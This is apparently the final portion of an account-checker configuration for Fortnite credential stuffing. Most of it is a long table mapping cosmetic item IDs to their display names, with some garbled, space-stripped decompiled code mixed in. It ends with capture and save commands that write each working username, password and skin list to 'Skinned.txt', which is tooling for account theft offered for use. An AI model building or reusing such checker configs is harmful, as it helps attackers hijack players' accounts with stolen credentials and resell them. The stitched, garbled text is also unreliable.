bid_170_mathfemale: Techie bid_178_angel: Ark bid_181_snowninjamale: Snowfoot bid_182_nutcrackermale: Birdshot bid_186_gingerbreadmale: MiniMarauder bid_187_gingerbreadfemale: GiddyGunner bid_189_streetgothmale: Eternal bid_190_streetgothfemale: Stitches bid_191_winterghoulmale: ShadowWings bid_192_wintercolidayfemale: CombatWreath bid_200_snowninjafemale: Snowbrand bid_208_cupiddarkmale: FallenWings bid_209_robottroublemale: BoardBag bid_210_robottroublefemale: CannisterCarrier bid_211_skullbrite: SkullySatchel bid_213_icecream: SnoCone bid_176_nautilusmale: Rebreather bid_177_nautilusfemale: Octotank bid_214_lovellama: Sweetheart bid_215_masterkey: MasterPortal bid_216_pirateprogressive: Mutiny bid_217_shinyfemale: HighCaliber bid_218_medusa: Cobra bid_219_farmermale: Haystacks bid_220_farmerfemale: SunSprout bid_221_aztecmale: Hypnotic bid_222_aztecfemale: SunWings bid_223_orangecamo: Oscilloscope bid_224_techopsblue: CarbonPack bid_201_wavymanmale: BendieInflator bid_202_wavymanfemale: TwistieInflator bid_225_bandageninjamale: KatanaKunai bid_226_bandageninjafemale: DualKama bid_227_sciopsfemale: Omission bid_228_sciopsmale: Commission bid_230_tropicalmale: BananaBag bid_231_tropicalfemale: PineappleStrummer bid_235_ceist: CrystalLlama bid_242_furnaceface: DyingLight bid_248_pilots: Gauge bid_249_streetopsstealth: StealthResponseUnit bid_251_spacebunny: CryoHops bid_250_thebomb: Volatile bid_252_evilbunny: Floppy bid_253_coppityheist: BunnyBag bid_254_shinymale: DiamondStar bid_255_moonlightassassin: LunarLight bid_256_shatterfly: ShatteredWing bid_257_swashbuckler: Slice&dice bid_258_ashtonboardwalk: WidowsPack bid_259_ashton_saltlake: Star-LordPack bid_261_rooster: HotWing bid_262_bountycunterfemale: Gobag bid_263_masako: ScarletEdge bid_264_stormtracker: Backtracker bid_265_battlesuit: Retribution bid_266_bunkerman: NanaCape bid_267_cyberscavengermale: CnXn bid_268_cyberscavengerfemale: Phrenzy bid_269_raptorfemale: Bomberbag bid_270_streetdemon: SpectralSpine bid_271_assassinsuitmale: AssassinPack bid_273_assassinsuitcoin: GoldToken bid_275_geisha: Gaze bid_277_whitetiger: PalettePack bid_278_vigilanteboard: BackBoard } }; //Token: 0x04000009RID: 9 publicstaticHashtablePickaxes=newHashtable { boltonpickaxe: CloseShave defaultpickaxe: Pickaxe halloweenscythe: Reaper happypickaxe: Lucky pickaxe_lockjaw: Raider'sRevenge sicklebatpickaxe: Batsickle skiicepickaxe: Cliffhanger spikypickaxe: Spiky pickaxe_deathvalley: DeathValley pickaxe_flamingo: PinkFlamingo pickaxe_id_011_medieval: Axecalibur pickaxe_id_012_district: PulseAxe pickaxe_id_013_teslacoil: AC/DC pickaxe_id_014_wintercamo: IceBreaker pickaxe_id_015_holidaycandycane: CandyAxe pickaxe_id_016_disco: DiscoBrawl pickaxe_id_017_shark: ChompJr. pickaxe_id_018_anchor: BottomFeeder pickaxe_id_019_heart: TatAxe pickaxe_id_020_keg: PartyAnimal pickaxe_id_021_megalodon: ToothPick pickaxe_id_022_holidaygiftwrap: YouShouldn'tHave! pickaxe_id_023_skiboot: SkiBoot pickaxe_id_024_plunger: Plunja pickaxe_id_025_dragon: DragonAxe pickaxe_id_026_brite: RainbowSmash pickaxe_id_027_scavenger: Sawtooth pickaxe_id_028_space: EVA pickaxe_id_029_assassin: TrustyNo.2 pickaxe_id_030_artdeco: EmpireAxe pickaxe_id_031_squeak: PickSqueak pickaxe_id_032_tactical: TacticalSpade pickaxe_id_033_potofgold: PotO'Gold pickaxe_id_034_rockerpunk: AnarchyAxe pickaxe_id_035_prismatic: SpectralAxe pickaxe_id_036_cuchulainn: SilverFang pickaxe_id_037_stealth: Spectre pickaxe_id_038_carrot: CarrotStick pickaxe_id_039_tacticalblack: Instigator pickaxe_id_040_pizza: Axeroni pickaxe_id_041_pajamaparty: Bitemark pickaxe_id_042_circuitbreaker: CuttingEdge pickaxe_id_043_orbitingplanets: GlobalAxe pickaxe_id_044_tacticalurbanhammer: Tenderizer pickaxe_id_045_valor: GaleForce pickaxe_id_046_candy: Lollipopper pickaxe_id_047_carbideblue: Positron pickaxe_id_048_carbideblack: Onslaught pickaxe_id_049_metal: Persuader pickaxe_id_050_graffiti: RenegadeRoller pickaxe_id_051_neonglow: GlowStick pickaxe_id_052_hazmat: Autocleave pickaxe_id_053_deco: Airfoil pickaxe_id_054_filmcamera: Director'sCut pickaxe_id_055_stop: StopAxe pickaxe_id_056_venus: Tendril pickaxe_id_057_jailbird: NiteOwl pickaxe_id_058_basketball: SlamDunk pickaxe_id_059_darkeagle: OracleAxe pickaxe_id_060_darkninja: FatedFrame pickaxe_id_061_wwiipilot: PropellerAxe pickaxe_id_062_soccer: EliteCleat pickaxe_id_063_vuvuzela: Vuvuzela pickaxe_id_064_gumshoe: MagnifyingAxe pickaxe_id_065_speedyred: RazorEdge pickaxe_id_066_flintlockred: CrimsonAxe pickaxe_id_067_taxi: VictoryLap pickaxe_id_068_drift: RiftEdge pickaxe_id_069_darkviking: Permafrost pickaxe_id_070_viking: Forebearer pickaxe_id_071_streetracer: LugAxe pickaxe_id_072_luchador: Piledriver pickaxe_id_073_balloon: BalloonAxe pickaxe_id_074_sharpdresser: StuddedAxe pickaxe_id_075_huya: Pointer pickaxe_id_076_douyu: PowerGrip pickaxe_id_077_carbidewhite: Resonator pickaxe_id_078_lifeguard: RescuePaddle pickaxe_id_079_modernmilitary: Caliper pickaxe_id_080_scuba: HarpoonAxe pickaxe_id_081_streetracercobra: ClutchAxe pickaxe_id_082_sushichef: FiletAxe pickaxe_id_083_exercise: Axercise pickaxe_id_084_durrburgerhero: PattyWhacker pickaxe_id_085_wukong: JinguBang pickaxe_id_086_biker: Throttle pickaxe_id_087_hippie: Drumbeat pickaxe_id_088_psburnout: Controller pickaxe_id_089_ravenquill: IronBeak pickaxe_id_090_samuraiblue: Cat'sClaw pickaxe_id_091_hacivat: TreeSplitter pickaxe_id_092_bling: Crowbar pickaxe_id_093_medic: Flatliner pickaxe_id_094_football: UprightAxe pickaxe_id_095_footballtrophy: GoldenPigskin pickaxe_id_096_footballreferee: FirstDowner pickaxe_id_097_raptorarcticcamo: Chill-Axe pickaxe_id_098_garageband: LeadSwinger pickaxe_id_099_modernmilitaryred: Pinpoint pickaxe_id_100_dieselpunk: Turbine pickaxe_id_101_octoberfest: Axcordion pickaxe_id_102_redriding: GuidingGlow pickaxe_id_103_fortnitedj: SmashUp pickaxe_id_104_cowgirl: Reckoning pickaxe_id_106_darkbomber: ThunderCrash pickaxe_id_107_calloweentomato: NightSlicer pickaxe_id_107_plague: Herald'sWand pickaxe_id_108_pumpkinslice: Carver pickaxe_id_109_skulltrooper: SkullSickle pickaxe_id_110_vampire: Moonrise pickaxe_id_111_blackwidow: WebBreaker pickaxe_id_112_guanyu: Guandao pickaxe_id_113_muertos: SixStringStriker pickaxe_id_114_badasscowboycowskull: Longhorn pickaxe_id_115_evilcowboy: DarkShard pickaxe_id_116_celestial: StellarAxe pickaxe_id_121_robotred: A.X.E. pickaxe_id_122_witch: Spellslinger pickaxe_id_123_cornedmask: Gatekeeper pickaxe_id_124_feathers: Scrambler pickaxe_id_125_moth: Lamp pickaxe_id_126_yeti: AbominableAxe pickaxe_id_127_rhino: Uni-horn pickaxe_id_131_nautilus: TBD pickaxe_id_131_neoncat: Scratchmark pickaxe_id_132_arcticsniper: Scorcher pickaxe_id_133_iceking: IceScepter pickaxe_id_134_snowman: Icicle pickaxe_id_135_snowninja: InvertedBlade pickaxe_id_136_math: T-Square pickaxe_id_137_nutcracker: SnowGlobe pickaxe_id_138_gnome: ColdSnap pickaxe_id_139_gingerbread: CookieCutter pickaxe_id_140_streetgoth: Vision pickaxe_id_141_krampus: BratCatcher pickaxe_id_142_teriyakifish: Bootstraps pickaxe_id_143_flintlockwinter: FrozenAxe pickaxe_id_144_angel: Virtue pickaxe_id_145_icemaiden: Flurry pickaxe_id_146_militaryfashion: CleanCut pickaxe_id_158_fuzzybear: CuddlePaw pickaxe_id_159_robottrouble: Crossroads pickaxe_id_160_icecream: IcePop pickaxe_id_163_pirateoctopus: SwagSmasher pickaxe_id_164_dragonninja: Dragon'sClaw pickaxe_id_165_masterkey: Lockpick pickaxe_id_166_shiny: Flawless pickaxe_id_167_medusa: Snakebite pickaxe_id_168_bandolier: Machete pickaxe_id_169_farmer: GoldDigger pickaxe_id_170_aztec: Axetec pickaxe_id_171_orangecamo: BruteForce pickaxe_id_172_bandageninja: Quickstrike pickaxe_id_173_sciops: PsionicEdge pickaxe_id_175_tropical: FreshCut pickaxe_id_179_starwand: StarWand pickaxe_id_180_tristar: Tri-Star pickaxe_id_181_log: Stumpy pickaxe_id_177_evilsuit: CrimsonScythe pickaxe_id_187_furnaceface: Dread pickaxe_id_189_streetopsstealth: StealthAngularAxe pickaxe_id_194_thebomb: Shrapnel pickaxe_id_195_spacebunny: PlasmaCarrot pickaxe_id_199_shinycammer: SilverSledge pickaxe_id_200_moonlightassassin: AstralAxe pickaxe_id_201_swashbuckler: FlintStriker pickaxe_id_202_ashtonboardwalk: Widow'sBite pickaxe_id_203_ashtonsaltlake: GuardianAxe pickaxe_id_204_miner: Rockbreaker pickaxe_id_205_strawberrypilot: Vox pickaxe_id_206_strawberrypilot_1c: HarmonicAxes pickaxe_id_207_bountycunter: Revoker pickaxe_id_208_masako: ScarletScythe pickaxe_id_209_battlesuit: MechAxe pickaxe_id_210_bunkerman: BunkerBasher pickaxe_id_211_bunkerman_1c: RipeRippers pickaxe_id_212_cyberscavenger: WebWrecker pickaxe_id_213_assassinsuitsledgehammer: SimpleSledge pickaxe_id_214_geisha: Shamisen defaultglider: Glider dev_testasset: DevTestAsset duo_umbrella: DuoUmbrella dynamicstestglider: Glider founderglider: Founder'sGlider founderumbrella: Founder'sUmbrella glider_bold: Modern glider_flames: HotRod glider_flowerpower: Petunia glider_id_tbd_modernmilitaryred: TBD glider_mig: Raptor glider_military: Warthog glider_prismatic: Prismatic glider_proxytest: Glider glider_random: RandomGlider glider_roadtrip: Roadtrip glider_stealth: Stealth glider_teststaticparts: Glider glider_venom: Wasp glider_voyager: Voyager glider_warthog: Mako preseasonglider: RainbowGlider preseasonglider_elite: RainbowGliderElite solo_umbrella: TheUmbrella squad_umbrella: SquadUmbrella umbrella_bronze: TheUmbrella umbrella_gold: TheUmbrella umbrella_paperparasol: PaperParasol umbrella_platinum: TheUmbrella umbrella_season_04: WetPaint umbrella_season_05: BeachUmbrella umbrella_season_06: Webrella umbrella_silver: TheUmbrella umbrella_snowflake: Snowflake glider_id_001: AerialAssaultOne glider_id_002_medieval: SirGlidertheBrave glider_id_003_district: RoyaleX glider_id_004_disco: GetDown! glider_id_005_holidaysweater: CozyCoaster glider_id_006_wintercamo: SnowSquall glider_id_007_turtleshell: HalfShell glider_id_008_graffiti: Zephyr glider_id_009_candycoat: GumDrop glider_id_010_storm: CloudStrike glider_id_011_jollyroger: JollyRoger glider_id_012_teddybear: BearForceOne glider_id_013_psblue: BlueStreak glider_id_014_dragon: RoyaleDragon glider_id_015_brite: RainbowRider glider_id_016_tactical: Carbon glider_id_017_assassin: HighOctane glider_id_018_twitch: Slipstream glider_id_019_taxi: Checker glider_id_020_fighter: FighterKite glider_id_021_scavenger: RustyRider glider_id_022_rockerpunk: StageDive glider_id_023_cuchulainn: StormSigil glider_id_024_reaper: FeatheredFlyer glider_id_025_shuttlea: OrbitalShuttle glider_id_026_shuttleb: DeepSpaceLander glider_id_027_satelite: PlanetaryProbe glider_id_028_googly: Googly glider_id_029_pajamaparty: FossilFlyer glider_id_030_circuitbreaker: Mainframe glider_id_031_metal: SolidStrider glider_id_032_tacticalwoodland: Steadfast glider_id_033_valor: WingsofValor glider_id_034_carbideblue: Intrepid glider_id_035_candy: SugarCrash glider_id_036_auroraglow: GlowRider glider_id_037_hazmat: Meltdown glider_id_038_deco: Triumph glider_id_039_venus: VenusFlyer glider_id_040_jailbird: StarryFlight glider_id_041_basketball: HangTime glider_id_042_soccer: Goalbound glider_id_043_darkninja: SplitWing glider_id_044_pterodactyl: Pterodactyl glider_id_045_carbideblack: Terminus glider_id_046_gumshoe: ViceroyMarkI glider_id_047_speedyred: Forerunner glider_id_048_viking: Conquest glider_id_049_lifeguard: Splashdown glider_id_050_streetracercobra: Cruiser glider_id_051_luchador: Libre glider_id_052_bedazzled: RhinestoneRider glider_id_053_huya: Rush glider_id_054_douyu: Helium glider_id_055_streetracerblack: Downshift glider_id_056_carbidewhite: Aurora glider_id_057_modernmilitary: Servo glider_id_058_shark: LaserChomp glider_id_059_durrburgerhero: FlyingSaucer glider_id_060_exercise: Windbreaker glider_id_061_streetracerbiker: Cyclone glider_id_062_streetracerwhite: WhiteSquall glider_id_063_sushichef: FlyingFish glider_id_064_biker: Blaze glider_id_065_hippie: Tie-dyeFlyer glider_id_066_samuraiblue: Purrfect. glider_id_067_psburnout: Flappy glider_id_068_garageband: HotRide glider_id_069_hacivat: ShadowPuppet glider_id_070_darkviking: Frostwing glider_id_071_football: Touchdown glider_id_072_bling: Safecracker glider_id_073_medic: Airlift glider_id_074_raptorarcticcamo: ColdFront glider_id_075_modernmilitaryred: Rotor glider_id_076_dieselpunk: Dirigible glider_id_077_octoberfest: Oktoberfeast glider_id_078_vampire: Swarm glider_id_079_redriding: Picnic glider_id_080_prairiepusher: CoveredCrusader glider_id_081_cowboygunslinger: Crossfire glider_id_084_plague: Lamplight glider_id_085_skulltrooper: CryptCruiser glider_id_086_blackwidow: Hatchling glider_id_087_guanyu: DivineDragon glider_id_088_evilcowboy: DarkEngine glider_id_089_muertos: Spirit glider_id_090_celestial: Discovery glider_id_092_streetops: Pivot glider_id_093_animaljackets: PoofyParasail glider_id_094_samuraiultra: Kabuto glider_id_095_witch: MagicWings glider_id_096_cornedmask: FlyingCarp glider_id_097_feathers: FlappyFlyer glider_id_098_sup: Hyper glider_id_099_moth: Flutterbug glider_id_100_yeti: RicketyRunner glider_id_101_tacticalsanta: TacticalSleigh glider_id_103_nautilus: TBD glider_id_104_durrburger: Glidurrr glider_id_104_math: PaperPlane glider_id_105_gingerbread: Gingersled glider_id_105_snowboard: RoyaleAir glider_id_106_fortnitedj: Equalizer umbrella_season_07: Snowfall glider_id_120_icecream: IceCreamCruiser glider_id_121_britebomberdeluxe: BriteBlimp glider_id_123_masterkey: Lockstep glider_id_124_medusa: SkySerpents glider_id_125_bandolier: Choppa glider_id_127_aztec: Sunrise glider_id_128_bootybuoy: BootyBuoy glider_id_129_fireelf: Cinder umbrella_season_08: PalmLeaf glider_id_130_sciops: Disruptor glider_id_137_streetopsstealth: StealthPivot glider_id_140_shatterfly: Arcana glider_id_141_ashtonboardwalk: AvengersQuinjet glider_id_142_ashtonsaltlake: TheMilano glider_id_143_battlesuit: Retaliator glider_id_144_strawberrypilot: TurboSpin glider_id_145_stormtracker: TailwindTwister" 
  KEY "glider_id_146_masako" VALUE "ScarletStrike glider_id_147_raptor: AssaultBomber glider_id_148_cyberscavenger: TechTurbine umbrella_season_09: Holographic glider_id_149_geisha: Engage umbrella_assassinsuit: OneShot" 
  "<Skin>" -> CAP "Skins" 

UTILITY File "Skinned.txt" AppendLines "<USER>:<PASS>|<SkinCount>|<Skins>" 

